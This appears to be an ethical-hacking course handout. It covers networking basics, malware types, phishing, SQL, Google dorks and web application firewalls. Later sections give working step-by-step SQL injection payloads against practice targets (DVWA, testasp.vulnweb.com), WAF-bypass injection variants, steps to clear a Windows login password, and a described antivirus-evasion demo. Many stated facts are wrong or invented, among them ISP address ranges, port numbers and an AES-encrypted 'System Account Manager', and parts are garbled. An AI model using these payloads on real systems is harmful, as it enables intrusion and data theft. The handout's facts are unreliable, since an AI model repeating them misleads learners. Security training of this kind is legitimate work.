IP Address

IP address:-An Internet Protocol address (IP address) is a numerical label assigned

to each device (e.g., computer, printer) participating in a computer network that uses
the Internet Protocol for communication. An IP address serves two principal functions:
host or network interface identification and location addressing. Its role has been
characterized as follows: "A name indicates what we seek. An address indicates where it
is. A route indicates how to get there”. it is like the phone number to you.

IP address are of two types:

1. Local IPor Static IP: - IP address of the computer when the computer is
not connected to the internet. It remains static i.e.it does not change.

Local IP are of two types: -

LAN:A local area network (LAN) is a computer network that interconnects
computers within a limited area such as a residence, school, laboratory, or office
building
 MAN: A metropolitan area network (MAN) is a computer network, larger than a
local area network, covering an area of a few city blocks to the area of an entire
city, possibly also including the surrounding areas.

Examples of local IP are:

192.168.1.1
192.168.0.1
172.16.0.1
10.0.0.1

2.Global IP or Public IP: -IP address provided by the DHCP to the host when it
gets connected to the internet. Global IP is not static IP i.e. it changes every time when
you are connected to the internet.((

(source:-www.wikipedia.com)
Examples of Global IP are:

Airtel: 122.0.0.1-122.255.255.254

BSNL: 57.0.0.1-57.255.255.254

Vodafone: 1.0.0.1-1.255.255.254

Tata: 14.0.0.1-14.255.255.254

Reliance: 112.0.0.0-112.255.255.255
ssss

IP VERSIONS:
There are two versions of IP:
IPv4: - In IPv4 an address consists of 32 bits which limits the address
space to 4294967296 (232) possible unique addresses. IPv4 reserves some addresses for
special purposes such as private networks i.e.18 million addresses or multicast
addresses i.e.270 million addresses.
IPv4 addresses are canonically represented in dot-decimal notation, which consists of
four decimal numbers, each ranging from 0 to 255, separated by dots, e.g.,
172.16.254.1. Each part represents a group of 8 bits of the address. In some cases of
technical writing, IPv4 addresses may be presented in various hexadecimal, octal,
or binary representations.
IPv6: -This new generation of the Internet Protocol was eventually named internet
protocol version 6 (IPv6) in 1995. The address size was increased from 32 to
128 bits (16 octets), thus providing up to 2128 addresses. This is deemed sufficient for the
foreseeable future.

(source:-www.wikipedia.com)

DIFFERENCE BETWEEN IPV4 AND IPV6:

IPSUBNETTING: -
A subnetwork, or subnet, is a logical, visible subdivision of an IP network. The practice
of dividing a network into two or more networks is called sub netting. Computers that
belong to a subnet are addressed with a common, identical, most-significant bit-group
in their IP address. This results in the logical division of an IP address into two fields, a
network or routing prefix and the rest field or host identifier. The rest field is an
identifier for a specific host or network interface. IP SUBNETTING is of two types i.e. IPv4
and IPv6.

DHCP
The Dynamic Host Configuration Protocol (DHCP) provides configuration parameters to
Internet hosts. DHCP consists of two components first one is protocol for delivering
host-specific configuration parameters from a DHCP server to a host and other one is
mechanism for allocation of network addresses to hosts.
Working Of DHCP:- DHCP Assigns the IP address by taking ip pool table length
and capacity in the process. It provide the LAN ip address to the computer which is
connecting to the internet. Every time the computer connects the internet DHCP assigns
a different ip address to the computer .

(source:-www.mywindows.com)

INTRODUCTION TO PORTS

These are the doors of your devices which can be tangible or intangible in nature which
is responsible inlet and outlet of data through the system.

THESE ARE OF TWO TYPES:-

PHYSICAL PORTS:-These are the tangible ports which we can see, touch and feel.
Examples :- USB port, HDMI port, VGA port etc.

VIRTUAL PORTS:-These are intangible in nature mostly based on protocols which

carry the data with respect to a particular standard defined by the IEEE.

Examples:-

HTTP : 80,8080

HTTPS: 443

SMTP : 25
VOIP : RANDOM

FTP : 21

SFTP : 19, 20

POP3 : 110

The ports above are pre-reserved ports but there are total 65336 Virtual Ports in our
computer.

DOMAIN NAME SERVER (DNS) :-

It is the server which connects the logical address to the physical address machine .

Source: -Wikipedia

Proxy Servers:-These are the dummy servers which are designed to change
the online identity and giving false identity on internet. These servers basically
used the IP address of any other country to break the restrictions or to hide their
identity. Proxy Servers are also big low level security to your internet surfing.

There Are Two Types of Proxy Server: -

1. Enterprise Level Proxy Servers:-These are proxy servers that gives their proxy
server to the website with the weak capacity of ping.

2. Client Based Proxy Servers:-These are the proxy servers which we use usually
to change our identity online and give security to it.

There are two type of client based proxy servers: -

1. Web based Proxy Servers:-These are those proxy servers which change your
Identity only on that particular browser window.
For Example: -

www.kproxy.com

www.freeproxyserver.ca

www.ninjaproxy.com

2. Standalone Application Proxy Servers:-When we use application

software’s to change our IP address then we can say we are using an application
based proxy server.

For Example: - Ultrasurf from Ultrasonic

Souce:-wikipedia

VPN:-A virtual private network (VPN) extends a private network across a public
network, such as the Internet. It enables users to send and receive data across
 shared or public networks as if their computing devices were directly connected to
the private network, and thus are benefiting from the functionality, security and
management policies of the private network. A VPN is created by establishing a
virtual point-to-point connection through the use of dedicated connections, virtual
tunnelling protocols, or traffic encryption.

For Example: -
Cyber Ghost
Hotspot Security Shield
Freegate

Browser Extension: -There Are Some Browser Extension we can also use to hide
our identity.

For Example: -

DOT VPN

Unlimited Free VPN

INTRODUCTION TO WEB TECHNOLOGIES

World Wide Web is made up many kinds of programing and software technologies.
There are basically frontend and backend technologies which we use to create websites.

Frontend: - Basically Frontends are the Presentation Layer Between User and
Backend Technologies. Linux Based Frontend are Apache, TOMCAT (PHP). Windows
Based Frontend are IIS (Internet Information Services) (ASP, ASPX)

Backend: - Basically Backend is Data Access Layer of Web Technologies. These

technologies actually store data of user in database server and connect the sites to
database. Linux Based Backend Technology is LAMP (Linux Apache My-SQL PHP).
Windows Based Backend Technology is WAMP (Windows Apache My-SQl PHP). XAMPP
(Cross Platform Apache My-SQL PHP Perl) is also multiple platform technology
 INFORMATION GATHERING
Information gathering is very essential step of an application security test. The
Information system designed for an organization must meet the requirements of the
end users of the organization. To obtain what an end user expects from the Information
System the designer must gain complete knowledge of the organization’s working. It is
important for the student to know the information gathering techniques so that no
information is overlooked and the nature and functions of an organization are clearly
understood. The main purpose of gathering information is to determine the information
requirements of an organization. Information requirements are often not stated
precisely by management. It is the analyst’s responsibility to prepare a precise Systems
Requirements Specifications (SRS), which is easily understood (SRS) by users, as SRS
document is a vital document before starting a project.

There are two types of Information Gathering: -

1. Web Based Information Gathering: - It consists of gathering of

information about the target/victim websites.

It can be done through some online information gathering portals: -

www.whois.domaintools.com
www.whois.com

This type of Gathering consists of Information like: -

Domain Id
Registrant Email
Registrant Id
IP location
Server type etc.

There are Two types of servers: -

 Shared Server: - The server which is connected to large number of websites is
called a Shared Server.

Dedicated Server: - The server which is only Dedicated/ Connected to one

website is called a Dedicated Server.

Whether the Server is Shared or Dedicated, it can be known by some online

information portals: -

www.yougetsignal.com

NETWORK BASED INFORMATION GATHERING: -

Simple Network Information Gathering: - It’s a process in which
we try to extract basic information about the network devices.

It consists of Information Gathering like: -

1. Total Number of LIVE IP addresses

2. MAC ADDRESS
3. Shared devices and Data on the network
4. CCTV IP addresses
5. shared printers etc.

It can be done through some software’s like i.e. Soft perfect Network Scanner or
Angry IP Scanner.
 Intelligent Information Gathering:-It is the type of information
which consists of some deep information about the Target/Victim computer.
This Information Consists of: -

1. Operating System
2. Open Closed Filtered Ports
3. Services Running on Open Ports
4. Version of Services of applications running on open ports.

It can be done through kali Linux with Software’s like nmap or zenmap.

How To Bypass Windows Login Password

Windows Stores its password authentication in a File Known As SAM(System Account

Manager).That Files Is Highly Encrypted With AES (Advanced Encryption Standard).So
we will Crack that File With Some Software.

Requirement:-
1.HirenBootCD

2.Blank CD or 1 GB Pendrive
Steps:-

1.Firstly Download Hiren Boot CD.

2.Burn That ISO File Into CD or Make Pendrive Bootable WithRufus

3.Then Turn On Your Pc Into BIOS Mode By pressing usually with F2 (In Some Computers
it may different like F8.F10,DEL.)
4.After Going to BIOS Mode than Change Boot Priority.

5.Save The Settings And Restart Your Pc.

6.Then Insert Your CD or Plugin Your Pendrive.

7.After Booted up Into Hiren Boot Cd.

8.Select Aero Boot Into Aero Mode.

9.Then Select Hiren Boot Cd Tools.

10.Select Password And Registry Changer.

11.Select Active Password Changer.

12.Select Option Search for SAM Database(s) on all hard disks and logical drives.

13.In next Step Press Enter And Select Your User Name From List.
14.Select Clear the User's Password and Press Y to save.

15.Restart Your Pc and remove Hiren Boot CD.

INTRODUCTION TO MALWARES
Malware refers to the malicious programming in the computer used to disrupt
computer operations, accessing sensitive information, Getting uninformed access of the
computer etc. These are of many types :-

1. Virus:- It is the malware program, that replicates itself or turn (specifically, a

folder)into large number of copies.These code effect the traditional behaviour of
the operating system and these virus cannot spread fron one computer to
another without human assisstance.No virus can be executed itself,until
someone double click on it.
2. Worms:- A computer worm is a standalone malware computer program that
replicates itself in order to spread to other computers. Often, it uses a computer
network to spread itself, relying on security failures on the target computer to
 access it. Unlike a computer virus, it does not need to attach itself to an existing
program. Worms almost always cause at least some harm to the network, even if
only by consuming bandwidth, whereas viruses almost always corrupt or modify
files on a targeted computer.

(www.wikipedia.com)

3. Trojans: -These are the RATs (Remote Administration Tools), once your
computer is infected with the Trojan it can be controlled remotely from
anywhere in the world. Hence an attacker can control entire hardware capacity
and bandwidth of your computer from anywhere in the world.
There are Two types of Trojans: -
 Direct Trojans: -In this type of Trojan once any computer is infected then it
will not send the access to the attacker hence attacker has to know the IP
address of the computer which is infected.

For Example: Beast Trojan

  Reverse Trojan: - In this .exe file which is designed to infect the computer is
carrying the reverse IP address of the attacker hence as someone click on the
.exe file they will force to make a connected with the attackers IP address.

For Example: Cybergate and Darkcomet.

(www.wikipedia.com)

4. Rootkits: -These are the add on’s of the virus and other malware codes which
gives a shelter to the code to make it invisible from all kind if anti-viruses and IDS
(Intrusion Detection System) and IPS(Intrusion Prevention system) systems.
These are designed to enable access to a computer or areas of its software that
would not otherwise be allowed (for example, to an unauthorized user) while at
the same time masking its existence or the existence of other software.

5. Botnets: - A botnet is a number of Internet-connected computers

communicating with other similar machines in an effort to complete repetitive
 tasks and objectives. These are the army of computers more than 1000 pcs which
are infected by the Trojans and in bulk they can be used by hackers for DDOS
attack.

(www.pcworld.com)

6. Spywares: - Spywares are the scripts which steals the credentials via a web
browser and sends the details to the attacker. Also it can be used to spy and
extract secret details and send back the attacker.

7. Adware’s: -These are the websites from which people raises huge money
through advertisement. Designed to generate huge money from Google AdSense
 by infected the websites and showing their advertisements on websites and
software’s when you install them without reading and selecting options.

8. Ransomwares: - It was originated in 2008 where once hacker infect a

computer instead of stealing or deleting they will encrypt the entire hard disk in
just few seconds and put a password there, password is almost 4096 Bit
encrypted hence no one on the planet can crack it. Also they ask for money via
bitcoins to send them the decrypting password within 48 hours as a counter.

If they don’t pay after 48 hours all files will be shredded and then deleted.

(www.pcworld.com)

Evading Antivirus
When we hear word Virus our mind thinks about antivirus. Antivirus can save us from
low level virus which are fully detectable. Even Paid or Premium Antiviruses Can’t Save
us from FUD (Fully Undetectable) Virus. Criminal make virus FUD Nature by using some
tools. In this Demo We can see how easily antivirus are bypassed.
 1.First We Created a Trojan then we test that virus on a site called
www.virustotal.com

2.In this pic we can see that out 54 antiviruses 50 find it a virus.

3.After this we Encrypted that virus with a tool.

4.After Encrypted that virus we used the same site test the virus.

5.This time there are only 29 antiviruses that find it virus. So from This Demo we can see
how easily antivirus are bypasable.

Phishing Attack
An attempt to acquire information such as usernames, passwords, and credit card
details by masquerading as a trustworthy entity in an electronic communication.

Spear phishing: -Phishing attempts directed at specific individuals or companies

have been termed spear phishing. Attackers may gather personal information about
their target to increase their probability of success. This technique is, by far, the most
successful on the internet today, accounting for 91% of attacks.

Clone phishing: -A type of phishing attack whereby a legitimate, and previously

delivered, email containing an attachment or link has had its content and recipient
 addresses taken and used to create an almost identical or cloned email. The attachment
or link within the email is replaced with a malicious version and then sent from an email
address spoofed to appear to come from the original sender. It may claim to be a resend
of the original or an updated version to the original. This technique could be used to
pivot (indirectly) from a previously infected machine and gain a foothold on another
machine, by exploiting the social trust associated with the inferred connection due to
both parties receiving the original email.

Whaling: -Several recent phishing attacks have been directed specifically at senior
executives and other high profile targets within businesses, and the term whaling has
been coined for these kinds of attacks. In the case of whaling, the masquerading web
page/email will take a more serious executive-level form. The content will be crafted to
target an upper manager and the person's role in the company. The content of a
whaling attack email is often written as a legal subpoena, customer complaint, or
executive issue. Whaling scam emails are designed to masquerade as a critical business
email, sent from a legitimate business authority. The content is meant to be tailored for
upper management, and usually involves some kind of falsified company-wide concern.
Whaling phisher men have also forged official-looking FBI subpoena emails, and claimed
that the manager needs to click a link and install special software to view the subpoena.

Source

SOCIAL ENGINEERING
Social Engineering (SE) is a blend of science, psychology and art. While it is amazing
and complex, it is also very simple.Unlike hacking, social engineering basically is done
by the social skills of a person .In this type of engineering all the information is accessed
by the permission of the user. It can also be defined as “Any act that influences a person
to take an action that may or may not be in their best interest.” It consists of many
types:

1. Baiting

Baiting involves dangling something you want to entice you to take an action the criminal
desires. It can be in the form of a music or movie download on a peer-to-peer site, or it can
 be a USB flash drive with a company logo labelled “Executive Salary Summary Q1 2013” left
out in the open for you to find. Then, once the device is used or downloaded, the person or
company’s computer is infected with malicious software allowing the criminal to advance
into your system.

2. Phishing

Phishing involves false emails, chats, or websites designed to impersonate real systems with
the goal of capturing sensitive data. A message might come from a bank or other well
known institution with the need to “verify” your login information. It will usually be a self-
made (fake) login page with all the right logos to look legitimate. It could also be a message
claiming you are the “winner” of some prize or lottery with a request to hand over your
bank information.

3. Pretexting

Pretexting is the human equivalent of phishing, where someone acts as an authority figure
or someone your trust to gain access to your login information. It can take form as fake IT
support needing to do maintenance, or a false investigator performing a company audit.
Someone might impersonate co-workers, the police, tax authorities or other seemingly
legitimate people in order to gain access to your computer and information.

Email Encryption
Internet Technology have many flows, loopholes, bugs. Cyber Criminal can easily hack
into your email account by many methods like social engineering, keylogger etc. You can
save yourself from hackers after hacked into your account by using email encryption.
You just have to set a private key that encrypt your whole message. If someone want
read your original massage you just have to decrypt that email message with your
private key which you have set before you sent that message. Software that we can use
to encrypt our emails: -

Chrome Extensions:-Secure Mail for Gmail (by Streak)

Mozilla Add On :-Encrypted Communication

IDN Homographic Attack

The internationalized domain name (IDN) homograph attack is a way a malicious party
may deceive computer users about what remote system they are communicating with,
by exploiting the fact that many different characters look alike, (i.e., they
are homographs, hence the term for the attack). For E.g. A Person who want attack on a
victim with website www.powerbank.com but it’s already Registered Domain then,
attacker register a new domain with same name with but different language character
like Russian, Greek alphabet.

Source

Fake E-mail and Trace E-mails

Fake E-mail: - Fake E-mail or E-mail Spoofing is that Email sent from someone
pretending to be someone else is known as spoofing. Spoofing may take place in a
number of ways. Common to all of them is that the actual sender's name and the origin
of the message are concealed or masked from the recipient. Many, if not most,
instances of email fraud do use at least minimal spoofing, as most frauds are clearly
criminal acts. Criminals typically try to avoid easy traceability.
SourceTrace E-mail: - We get Daily Thousands of spam or fake emails, so it’s
difficult to tolerate that emails. If we want to get information about email sender, we
just have to find full source or full header e-mail. In Source we can find information
about sender’s domain detail and other details.

Introduction to Vulnerability Assessment and

Penetration Testing (VAPT)

VAPT consists of two halves I.e. VA (Vulnerability Assessment) and PT (Penetration

Testing).

VA (Vulnerability Assessment):- It consists of information gathering about the vulnerable

flaws or the loop holes which may be used by the attackers to gain the access by
exploiting those vulnerabilities.

PT (Penetration Testing):-PT is concerned with the hacking attempts made to gain

access to the device or system on the network. In this method many attack vectors are
deployed to observe the executional outcome of the device or a technology.

SQL Basics
SQL: -Structured Query Language is a special-purpose programming language
designed for managing data held in a relational database management system (RDBMS),
or for stream processing in a RDSMS. Source
Some of The Most Important SQL Commands

1.SELECT

The SELECT statement is used to select data from a database.

The result is stored in a result table, called the result-set.

Syntax

SELECT column_name,column_nameFROM table_name;

2. DISTINCT

In a table, a column may contain many duplicate values; and sometimes you only want
to list the different (distinct) values.

The DISTINCT keyword can be used to return only distinct (different) values.

Syntax

SELECT DISTINCT column_name,column_name

FROM table_name;

3. WHERE

The WHERE clause is used to extract only those records that fulfill a specified criterion.

Syntax

SELECT column_name,column_name
FROM table_name
WHERE column_name operator value;

4. And & OR

The AND operator displays a record if both the first condition AND the second condition are true.
The OR operator displays a record if either the first condition OR the second condition is true.

AND Syntax

SELECT * FROM Customers

WHERE Country='example'
AND City='example';

OR Syntax

SELECT * FROM Customers

WHERE City='example'
OR City='example';

5. Order By

The ORDER BY keyword is used to sort the result-set by one or more columns.The
ORDER BY keyword sorts the records in ascending order by default. To sort the records
in a descending order, you can use the DESC keyword.

Syntax

SELECT column_name, column_name

FROM table_name
ORDER BY column_name ASC|DESC, column_name ASC|DESC;

6. Insert Into

The INSERT INTO statement is used to insert new records in a table.

Syntax

INSERT INTO table_name (column1,column2,column3,...)

VALUES (value1,value2,value3,...);

7. Update

The UPDATE statement is used to update existing records in a table.

Syntax

UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;

8. Delete

The DELETE statement is used to delete rows in a table.

Syntax

DELETE FROM table_name

WHERE some_column=some_value;

9. Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL
statement, via web page input.Injected SQL commands can alter SQL statement and
compromise the security of a web application.

10. Select Top

The SELECT TOP clause is used to specify the number of records to return.

The SELECT TOP clause can be very useful on large tables with thousands of records.
Returning a large number of records can impact on performance.

Syntax

SELECT TOP 2 * FROM Customers;

13. Like

The LIKE operator is used to search for a specified pattern in a column.

Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name LIKE pattern;

14. Wildcards

In SQL, wildcard characters are used with the SQL LIKE operator. SQL wildcards are used
to search for data within a table.

Wildcard Description
% A substitute for zero or more characters
_ A substitute for a single character
[charlist]

Sets and ranges of characters to match

[^charlist] Matches only a character NOT specified within the brackets

or
[!charlist]

Syntax

SELECT * FROM Customers

WHERE City LIKE 'ber%';

15. IN

The IN operator allows you to specify multiple values in a WHERE clause.

Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name IN (value1,value2,...);

16. Between

The BETWEEN operator selects values within a range. The values can be numbers, text, or dates.
Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value.

17.Between

The BETWEEN operator is used to select values within a range.

Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value2;

18. Aliases

SQL aliases are used to give a database table, or a column in a table, a temporary name.
Basically aliases are created to make column names more readable.

Syntax

SELECT column_name AS alias_name

FROM table_name;

19. Union

The UNION operator is used to combine the result-set of two or more SELECT
statements.

Notice that each SELECT statement within the UNION must have the same number of
columns. The columns must also have similar data types. Also, the columns in each
SELECT statement must be in the same order.

Syntax

SELECT column_name(s) FROM table1

UNION
SELECT column_name(s) FROM table2;
20. Select INTO

The SELECT INTO statement selects data from one table and inserts it into a new table.

Syntax

We can copy all columns into the new table:

SELECT *
INTO newtable [IN externaldb]
FROM table1;

21. Insert Into Select

The INSERT INTO SELECT statement selects data from one table and inserts it into an
existing table. Any existing rows in the target table are unaffected.

Syntax

We can copy all columns from one table to another, existing table:

INSERT INTO table2

SELECT * FROM table1;

22. Create DB

The CREATE DATABASE statement is used to create a database.

Syntax

CREATE DATABASE dbname;

23. The CREATE TABLE statement is used to create a table in a database.

Tables are organized into rows and columns; and each table must have a name.
Syntax

CREATE TABLE table_name

(
column_name1 data_type(size),
column_name2 data_type(size),
column_name3 data_type(size),
....
);

24.CHECK

The CHECK constraint is used to limit the value range thsat can be placed in a column.

If you define a CHECK constraint on a single column it allows only certain values for this
column.

If you define a CHECK constraint on a table it can limit the values in certain columns
based on values in other columns in the row.

25. Index

An index can be created in a table to find data more quickly and efficiently.

The users cannot see the indexes, they are just used to speed up searches/queries.

Syntax

CREATE INDEX index_name

ON table_name (column_name)

26. Drop
The DROP INDEX statement is used to delete an index in a table.

Syntax

DROP INDEX table_name.index_name

27. Alter

The ALTER TABLE statement is used to add, delete, or modify columns in an existing
table.

SQL ALTER TABLE Syntax

ALTER TABLE table_name

ADD column_name datatype

28. Auto Increment

Auto-increment allows a unique number to be generated when a new record is inserted

into a table.

Syntax
CREATE TABLE Persons
(
ID int NOT NULL AUTO_INCREMENT,
LastName varchar(255) NOT NULL,
FirstName varchar(255),
Address varchar(255),
City varchar(255),
PRIMARY KEY (ID)
)
29. Views

A view is a virtual table.

Syntax

CREATE VIEW view_name AS

SELECT column_name(s)
FROM table_name
WHERE condition

30. Null Values

If a column in a table is optional, we can insert a new record or update an existing

record without adding a value to this column. This means that the field will be saved
with a NULL value.

Syntax

SELECT LastName,FirstName,Address FROM Persons

WHERE Address IS NULL

Source

SQL Injection

SQL injection is a code injection technique, used to attack data-driven applications, in

which malicious SQL statements are inserted into an entry field for execution (e.g. to
dump the database contents to the attacker).SQL injection must exploit a security
vulnerability in an application's software, for example, when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and unexpectedly executed. SQL injection is mostly
known as an attack vector for websites but can be used to attack any type of SQL
database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the
complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.

Source

Insecure Direct Object Reference

Insecure Direct Object Reference means accessing some objects or critical data by
unauthorized access. This Process Is done by just changing some ids, strings, directories
etc. in URL. This is happened because lack of securing every critical files.

Sensitive Data Exposure

Sensitive Data Exposure means critical data of a website exposed on search engines.
This Happened due to not securing each and every file in web directory. Search engines
Scans every directory and every file of websites. In Search results it exposes some
critical data like username , password , credit card details etc.

DVWA Setup and Configuration

First We Have to Setup the XAMPP Server and We Have to Copy Our DVWA Framework
Folder to htdocs folder of XAMPP installed directory. After Moving the folder to XAMPP
Folder. Then Start Your XAMPP’s Apache and MySQL server. After All these Process, visit
your local host. In URL Add folders directory. Now Your DVWA Framework is configured
for work.

Union Based SQL Injection

Target: http://127.0.0.1/dvwa/vulnerabilities/sqli/

Database -> Tables -> Columns -> Data

Step 1: Find any GET parameter in the URL of the website.

http://127.0.0.1/dvwa/vulnerabilities/sqli/

GET : .php?id=10

POST: .php

? ----> There is a table in the database.

.php?id=2 --> select id=2 front column values.

Users

ID First Name Last Namw

2 Giorden Brown

Step 2: Check the exception handling of the website.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#

Step 3: Count the total number of columns in the respective URL table.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 order by 1--+ &Submit=Submit#

Step 4:Dump the DDL of the table's columns for custom query execution.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select 1,2--+ &Submit=Submit#

Step 5: Check the database and version of the mysql.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select database(),version()--+
&Submit=Submit#

Table: information_schema.tables

Columns :information_schema.columns

Step 6: Extract the entire database tables on the front end.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select

1,table_name from information_schema.tables--+ &Submit=Submit#

Target : users

Step 7: Get the columns of the users table

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select

1,column_name from information_schema.columns where

table_name=char(117 ,115 ,101 ,114 ,115)--+ &Submit=Submit#

Step 8: Get the data from columns user and passwords

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2 union select user,password from users-

-+ &Submit=Submit#
Security

--------

1. Never Use GET Methods

2. Always save passwords in md5 + salt hash minimum.

3. Use HTTPS for the encrypted communication : 128 Bit

Organisation

4. Proper Validation on data base inputs from the end users

For : www.owasp.org : SQL Injection

a= alpha

a=char

apple=word

apple=string

users-->string ????

Validation ---> string

String ---> ASCII

ERROR BASED SQL INJECTION

 Error based injection is deployed on databases which is powered by MS-SQL.

Database: MY-SQL : PHP

MS-SQL : .asp or .aspx

Probelm with Error Based Injection for a Hacker

1. Version() and database() not works!!

Solution : @@version
2. You can not call all the tables from the given database through information_schema.
3. You cannot extract columns of your target table in a go.

Target : vulnweb.com : It is practice framework from a company called Acunetix.

It has all MY-SQL and MS-SQL technology attack practices.

Step 1: Get any GET method in the URL of the website. I.e We have to look for any
Something=Something.
http://testasp.vulneb.com/showforum.asp?id=0

Step 2: Check the exception handling.

http://testasp.vulnweb.com/showforum.asp?id=0'

Step 3: Check the conditions required for further attack.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;

NOte : Error Based Injection works on LIFO rule. Last in First out.
For Example: If we have a database with tables like followings
threads -> 1
teacher->2
classes->3
fee->4
users->5

Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and

 1=convert(int,(select top 1 table_name from information_schema.tables));

Got Table : 'threads' X

http://testasp.vulnweb.com/showforum.asp?id=0 and
1=convert(int,(select top 1 table_name from
information_schema.tables wheretable_name not in ('threads')));
1.
Target : 'users'

Step 5: Get the respective columns of the users table

http://testasp.vulnweb.com/showforum.asp?id=0 and
1=convert(int,(select top 1 column_name from
information_schema.columns wheretable_name='users' and column_name not in
('uname')));
2.
Target Column : uname, upass

Step 6: Get the uname and upass

http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 upass from users));

uname:admin
upass: none

Google Dorks
Google Dork or Google Hacking Means Use some advanced google search filters to find
a specific result. Hackers Use these filters to find unexpected exposed data like SQL
Admin, Credit Card no. etc.
History of Google Dorks: The concept of "Google Hacking" dates back to 2002,
when Johnny Long began to collect interesting Google search queries that uncovered
vulnerable systems and/or sensitive information disclosures - labeling them google
Dorks.

The list of google Dorks grew into large dictionary of queries, which were eventually
organized into the original Google Hacking Database (GHDB) in 2004.These Google
hacking techniques were the focus of a book released by Johnny Long in 2005, called
Google Hacking for Penetration Testers, Volume 1. Since its heyday, the concepts
explored in Google Hacking have been extended to other search engines, such as Bing
and Shodan. Automated attack tools use custom search dictionaries to find vulnerable
systems and sensitive information disclosures in public systems that have been indexed
by search engines.

But in 2012 Google held an open challenge for anyone to infiltrate their resisting
servers. For a full visual timeline, detailing the major events and developments in
Google Hacking from 2002 to Present, see the Google Hacking History by Bishop Fox.

History Source

Some Google Dorks:

1. intitle: - intitle operator used to find a specified tittle name of website for.
2. inurl: - inurl operator used to find specific text in URL.
3. intext: - intext search operator used to find search in description version of
website.
4. index : - index operator used to find specific web directories and files.
5. Cache :- cache is used to find cached version of sites.
6. Link:- link operator is used to find linked sites with a particular site.
7. Site:- site operator is used to find search result on a specific website.
8. Filetype:- This Query is used to find results about specific type or extension of
file.
9. Define:- define operator is used to find explanation or definition of word.
10. Related:- Related is used to find search result which relates to that specific word.
11. Info:- This operator is used to find info about a particular domain.
12. Source: This is used to find any search result to specific website
13. Weather: This is used to get weather details about a particular postal code.
14. Author :- This query is used to find books or articles by specific writer.
 15. Location: - This query is restricting the results accordingly to the specific location.
16. allinurl: - This operator is same as inurl but used to find same as which is
searched
17. allintext: - This operator is same as intext but used to find same as which is
searched.
18. allintitle:- This operator is same as intitle but used to find same as which is
searched
19. inanchor :- This search query is used to filters to the anchor text or links.
20. Phonebook: This operator is used to find phone no. of particular person or a
organization.

Introduction to Web Application Firewall and IDS and

IPS
IDS :Intrution Detection System : It can be application and hardware which is mainly
deployed to analys the network traffic and udnerstand the type of attack and let the
owner know that which IP address is doing what type of attack with in the organisation.

IPS :Intrution Prevention System : Again it works on a black list coupled woth a lot of
attack database range , if any one in the network apply the attack which matches with the
database of attacks , IPS will block the req and hence that IP again cannot communicate in
the same network i.e Black Listed IP address.

Web Application Firewall : When a web site owner deploy a application software
containing all kind of attack database in it and filter the request deployed by the
vistor , then we can say that the application which is deployed on the website is web
application firewall.

Types of WAF
1. Software WAF: These are the firewall technologies which are just like a software
application can be installed on the web server and hence can be used to filetr the
requested contents.

Linux : Mod Security : Free | Paid :.php

Windows : Dot Defender : Paid :. asp aspx

2. Hardware WAF : These are the UTM systems ( Unified Threat Management Systems) i.e
it contains Antivirus + Firewall + IDS and IPS + Web Filteration for Content etcetc etc.

Mod Security : Mod Security comes to picture in early 2008 when hackers are on the peak
and defacing websites all over the world. This was era when there are many paid firewalls
but there was no solution for the middle level organisations.

Mod Security came and gives a little hope to web site owners dat they will protect from
hackers.

Problems

1. Attack database was limited.

2. Open source but lack of funding.

OWASP TOP 10 Attack they made open. Call to Hackers.

How to Install Mod Security on Ubuntu

--------------------------------------
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF

Every WAF works on two principal formats first White List and Black List filteration.
1. White List : When we declare the owner must only login from a certain static
IP as well as MAC address and username and password. Hence even the password got
leaked no one can login the website unless he is not on the same IP and the MAC address.

2. Black List : It's the second way of securing the website hence it will be having a
database of all the non sense attacks especially string based ( order by ), (union all select)
etcetcetc.Hence any request carrying this kind of string from VISITOR will be get filtered
by the blacklist and in response will block if match with any string from the list.

How to Configure Your Mod Security in Ubuntu After Installation

sudogedit /etc/apache2/sites-available/000-default.conf
After opening this file i.e 000-default.conf we have to change the IP address of the server
or the website name whose traffic which we want to filter from mod security.

Bypassing WAF Validations and Filterations

1. Upper Lower Case Method

union all select :UnIoNaLlSeLeCt

http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' UnIoN SeLeCt 1,2--
+&Submit=Submit#

Inline Comments : /* */

2. Inline Executable Comments

/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
Step 1: Get the tables from the database
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
1,2--+&Submit=Submit#

Target Table is users

Step 2: get the columns

http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
1,column_name from information_schema.columns where table_name='users'--
+&Submit=Submit#

Version Based Inline Executable Comments

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1'
/*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from
information_schema.columns where table_name='users'--+&Submit=Submit#

Honeypots
Honeypots are the traps deployed by the web developers in which hackers try to attack
andhoneypot logs the IP and cookies of the hackers for the further law enforcement
acivities.

Types of HoneyPots
1. Production HoneyPot : These are the middle level honey pots deployed by teh middle
level organisatiosn as its cheap in price , easy to deploy and easy to moniter.But they
